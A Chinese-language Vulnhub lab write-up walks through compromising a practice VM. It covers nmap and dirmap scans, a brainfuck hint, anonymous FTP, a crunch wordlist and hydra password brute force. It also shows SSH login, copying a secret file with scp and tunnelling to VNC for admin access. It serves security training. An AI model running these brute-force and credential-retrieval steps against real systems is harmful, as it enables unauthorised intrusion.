Vulnhub下载地址:
链接:https://pan.baidu.com/s/1GROpdsN9quDjAyBhTnHfIw
提取码:8xw7
0x01环境介绍
攻击机:192.168.10.128
靶机:192.168.10.134
0x02信息收集
先用nmap进行信息收集
nmap -A -T4 -v -p- 192.168.10.134
有ssh、ftp、http服务的端口,重点关注这几个
python3 dirmap.py -i http://192.168.10.134 -lcf
很显眼的robots.txt文件
底下有个brainfuck
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>+++++++++++++++++.>>---.+++++++++++.------.-----.<<--.>>++++++++++++++++++.++.-----..-.+++.++.
解码地址:https://www.splitbrain.org/services/ook%E2%80%8B
(当然还有其他的,能用就行)
0x03 检测
http://192.168.10.134/alfa-support
大致的意思就是,他忘了密码,密码是他的宠物狗的名字加上后面三位数
利用ftp访问一下有啥东西,匿名登陆,我直接用Kali的文件输ftp://192.168.10.134
这应该是他宠物狗的名字
crunch 7 7 -t milo%%% -o 123.txt (生成最高7位 最低7位 % 代表数字 输出到123.txt)
0x04 利用
hydra -l thomas -P 123.txt -v -f 192.169.10.134 ftp
利用ssh登陆ssh -p 65111 [email protected]
查看有个user.txt
看了下提权啥的,没啥思路,看下端口吧,5901端口是vnc端口(远程桌面)
scp -P 65111 [email protected]:/home/thomas/.remote_secret ./
-P 是端口的意思 将192.168.10.134的thomas目录下的/home/thomas.remote\_secret 复制到当前目录下./
ssh搭建隧道
ssh -p 65111 -L 5901:localhost:5901 [email protected]
vncviewer -passwd .remote_secret localhost:5901
利用vncviewer登陆自己的5901端口,密码是.remote_secret里的内容
获得flag,管理员权限
0x05 总结(个人观点,仅供参考)
1、nmap有多种用法,具体还是得看个人习惯或者说哪个好用,像65111端口,我用nmap -sV -O 192.168.10.134是检测不到的
2、brainfuck解密,得上网搜,有时间一定写个脚本,去收集特征,下次遇到直接利用脚本进行判断
3、scp的使用,参考https://www.runoob.com/linux/linux-comm-scp.html
4、ssh搭建隧道,参考https://mp.weixin.qq.com/s/JR9tfIjewLR6cbHNcfA3Ew
5、vnc,是linux系统里的远程桌面,默认端口是5901,vncviewer的使用方法还在找,大概就是vncviewer 端口 (-passwd .remote_secret 如果有密码的话)
来源:freebuf.com 2021-07-17 20:58:05 by: sec庄sir
请登录后发表评论
注册